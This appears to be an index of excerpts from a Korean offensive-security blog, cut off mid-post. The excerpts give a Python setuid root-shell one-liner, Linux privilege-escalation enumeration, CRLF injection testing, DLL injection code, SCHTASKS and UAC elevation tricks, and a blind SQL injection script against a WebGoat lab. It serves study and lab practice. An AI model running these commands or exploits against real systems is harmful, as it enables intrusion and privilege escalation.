pcap 파일에서 평문으로 전송하는 정보중에 계정정보가 있는지 확인한다.FTP의 계정이 SSH 계정으로 로그인 가능할 수도 있다. python에 setuid 권한이 부여되어 있는 경우 다음의 파이썬 명령어로 root 쉘을 열 수 있다.setuid(0) 없이 명령어 실행 시 현재 계정으로 쉘이 열리게 된다.python -c 'import os;os.setuid(0) os.system("/bin/sh")'

COUNTRY.IS IP 질의를 통한 국가 조회 https://country.is/ IP Geolocation API | Country.is Country has a minimal 🔥 interface. Have your browser or app query its own IP address. Query an abitrary IP. https://api.country.is/9.9.9.9 See the data sources. Country automatically checks for new MaxMind data every 24 hours. If you prefer not to use t country.is MAXMIND ASN 및 IP 대역 별 국가 정보 데이터 파일 제공 https://www.maxm..

일반적으로 호스트 쉘을 획득하면 상위 권한 탈취를 위하여 정보를 수집해야한다. 이 수집하는 행위를 Enumeration라고 한다. 기초 정보를 획득하기 위하여 다음의 정보를 수집하자. 운영체제 버전 - 주로 알려진 운영체제에 따라 사용하는 툴 또는 익스플로잇 여부를 확인할 수 있다. 커널 버전 - 잘알려진 커널이라면 취약점 정보를 획득할 수 있다. 이에 쓰이는 취약점은 시스템을 사용불가 할 수 있게 하므로 실행하기전 파급효과를 인지하도록 하 싱행중인 서비스 - 실행중인 프로세스의 권한을 확인한다. 잘못된 설정으로 root로 실행되게 할 수도있다. Cy3erLuna@htb[/htb]$ ps aux | grep root root 1 1.3 0.1 37656 5664 ? Ss 23:26 0:01 /sbin/i..

무선 기술 표준인 Bluetooth는 고정 및 모바일 장치에서 단거리로 데이터를 전송하기 위해 설계되었습니다. 이 기술은 2.402GHz ~ 2.480GHz의 ISM 대역에서 무선 주파수를 사용하여 개인 영역 네트워크(PAN)를 구축하는 방식으로 작동합니다 장치 간 단거리 무선 통신을 위해 설계된 Bluetooth 기술은 오늘날의 디지털 시대에 어디에나 존재합니다. 이러한 편리함에도 불구하고 해커에게는 새로운 공격 대상이 될 수 있습니다. 몇 가지 유형의 블루투스 해킹 종류는 다음과 같습니다. 블루스나핑(Bluesnarfing): 블루투스를 통해 무선 디바이스의 정보에 무단으로 액세스하는 사이버 공격입니다. 블루재킹(Bluejacking): 블루투스 사용 장치에 원치 않는 메시지를 보내는 공격입니다. 블..

대부분의 해시 알고리즘은 일정한 길이의 해시를 생성합니다. 특정 해시의 길이는 해시가 해시된 알고리즘에 매핑하는 데 사용할 수 있습니다. 예를 들어 32자 길이의 해시는 MD5 또는 NTLM 해시일 수 있습니다. 해시 값이 있으면 hashid로 어떤 유형의 해시인지 알 수 있다.

CRLF -> 로그 인젝션, 로그 포이즈닝 -> XSS, RCE redirection 처리되는 파라미터에 Response 패킷에 CRLF 공격을 통하여 임의의 데이터(html 구조 등)를 삽입할 수 있다. 개행문자를 삽입하여 그대로 시스템에서 인식하는 것이 취약하다 이를 방지하기 위해서 URL로 인코딩되도록 하여 CRLF 인젝션을 방지 한다. 위의 공격은 HTTP Request 패킷의 파라미터 등을 조작하여 사용자에게 오는 Response 패킷의 응답을 조작하는 방법이다. 테스팅 툴로는 파이썬의 crlfsuite를 사용하면 된다 pip3 install crlfsuite KoCOnU72@htb[/htb]$ crlfsuite -h usage: crlfsuite [-h] [-t TARGET] [-iT TARG..

DLL Injection 공격 흐름 실행 중인 프로세스를 대상으로 합니다. 프로세스 주소 공간에 메모리를 할당합니다. DLL 경로를 해당 메모리에 씁니다. 대상 프로세스의 스레드에서 DLL을 로드하는 함수를 실행합니다. import ctypes # ctypes 모듈 임포트 import sys # sys 모듈 임포트 import os # os 모듈 임포트 import psutil # psutil 모듈 임포트 def inject_dll(target_process_name, dll_path): # 대상 프로세스를 찾습니다. target_pid = None for process in psutil.process_iter(['name', 'pid']): if process.info['name'] == target_..

해당 파이썬 함수로 아래와 같이 최고 권한의 프로그램 실행을 할 수 있다. os.system(f'SCHTASKS /Create /TN {SVC_NAME} /SC ONLOGON /TR {SVC_PROG_PATH} /RL HIGHEST') 또는 일반 명령어로 SCHTASKS /Create /TN "Go" /SC ONSTART /TR "C:\Users\AidenLee\Downloads\go.exe" /RL HIGHEST /RU "SYSTEM" 응용 os.system()을 사용하여 Windows에서 권한 상승을 요청하는 방법 중 하나는 작업 스케줄러(Task Scheduler)를 사용하는 것입니다. 이미 사용하고 계신 SCHTASKS 명령은 이 방법 중 하나입니다. 아래는 다른 몇 가지 방법을 제공합니다. ru..

온라인에서 발견되는 기존 파이썬 권한 상승 요청 코드의 경우 패키지 이름이 win32com에서 shell을 요청하지만 2022년 기준 win32comext에 존재한다. import os import sys # win32com.shell이 아닌 win32comext 이다 from win32comext.shell import shell ASADMIN = 'asadmin' print(sys.argv) if sys.argv[-1] != ASADMIN: script = os.path.abspath(sys.argv[0]) params = ' '.join([script] + sys.argv[1:] + [ASADMIN]) shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.execut..

import requests password = str() cre = "created" url = "http://localhost:8080/WebGoat/SqlInjection/challenge" cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'} print ('[*] Get password length...') password_length = int() for length in range(1,30): datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'conf..